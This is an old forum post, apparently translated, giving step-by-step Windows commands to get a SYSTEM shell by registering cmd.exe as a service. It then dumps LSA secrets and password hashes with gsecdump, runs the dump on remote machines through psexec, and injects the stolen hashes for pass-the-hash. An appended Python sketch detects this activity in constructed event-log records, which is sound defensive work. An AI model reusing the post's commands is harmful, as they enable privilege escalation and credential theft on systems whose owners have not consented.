Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; admins are going to be kept busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; this is simply a matter of using the tool. As the original article puts it, no matter whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
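For the defender's side of the post above, here is an added detection example (it is not part of the post or of the linked blog, and it uses no code from either). It runs three checks over constructed Windows event-log records: the sc create step leaves a System log event 7045 whose ImagePath is cmd.exe; PsExec installs a service named PSEXESVC (also event 7045); and tools that create a new logon session with injected credentials leave a Security log event 4624 with logon type 9, logon process seclogo and authentication package Negotiate. The field names mirror the real events, but every record below is constructed sample data, not a captured log.

```python
"""Detection sketch, run over constructed event-log records, for the activity
described in the post: a shell registered as a service (System log 7045),
PsExec's service install (7045 with service name PSEXESVC), and a logon created
by injecting credentials into the local LSA (Security log 4624, logon type 9,
logon process seclogo). Field names follow the real events' EventData."""
import re
from typing import Dict, List

Event = Dict[str, str]

# A command interpreter has no business being a service's ImagePath.
SHELL_IMAGE_RE = re.compile(r"(?:^|\\)(cmd|powershell|pwsh)\.exe\b", re.IGNORECASE)

# Constructed sample records (not real log data).
SAMPLE_EVENTS: List[Event] = [
    {"RecordId": "1", "EventID": "7045", "ServiceName": "shellcmdline",
     "ImagePath": r"C:\WINDOWS\system32\cmd.exe /K start", "StartType": "demand start"},
    {"RecordId": "2", "EventID": "7045", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "StartType": "demand start"},
    {"RecordId": "3", "EventID": "7045", "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "StartType": "auto start"},
    {"RecordId": "4", "EventID": "4624", "TargetUserName": "alice", "LogonType": "9",
     "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"RecordId": "5", "EventID": "4624", "TargetUserName": "alice", "LogonType": "2",
     "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
    {"RecordId": "6", "EventID": "4624", "TargetUserName": "svc", "LogonType": "9",
     "LogonProcessName": "Advapi", "AuthenticationPackageName": "Negotiate"},
]


def classify(event: Event) -> List[str]:
    """Return the names of the rules this event matches (empty when none)."""
    hits: List[str] = []
    if event.get("EventID") == "7045":
        # Rule 1: the sc create trick from the post registers cmd.exe as a service.
        if SHELL_IMAGE_RE.search(event.get("ImagePath", "")):
            hits.append("shell-registered-as-service")
        # Rule 2: PsExec drops and registers its own service on the target.
        if event.get("ServiceName", "").upper() == "PSEXESVC":
            hits.append("psexec-service-installed")
    elif event.get("EventID") == "4624":
        # Rule 3: logon type 9 (NewCredentials) via the secondary logon service
        # with Negotiate is the signature of credentials injected into LSA.
        if (event.get("LogonType") == "9"
                and event.get("LogonProcessName", "").lower() == "seclogo"
                and event.get("AuthenticationPackageName", "").lower() == "negotiate"):
            hits.append("injected-credentials-logon")
    return hits


def scan(events: List[Event]) -> Dict[str, List[str]]:
    """Group the RecordIds of matching events by rule name."""
    alerts: Dict[str, List[str]] = {}
    for ev in events:
        for rule in classify(ev):
            alerts.setdefault(rule, []).append(ev["RecordId"])
    return alerts


if __name__ == "__main__":
    for rule, ids in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: records {', '.join(ids)}")
```

Two caveats on rule 3: `runas /netonly` produces the same type 9 / seclogo / Negotiate logon, so it needs baselining against known admin use rather than firing on its own; and a tool that patches lsass memory directly, as the post says iam does, may create no new logon event at all, which is why the service-install rules on 7045 (and the lsass access itself) are the more reliable signal for that case.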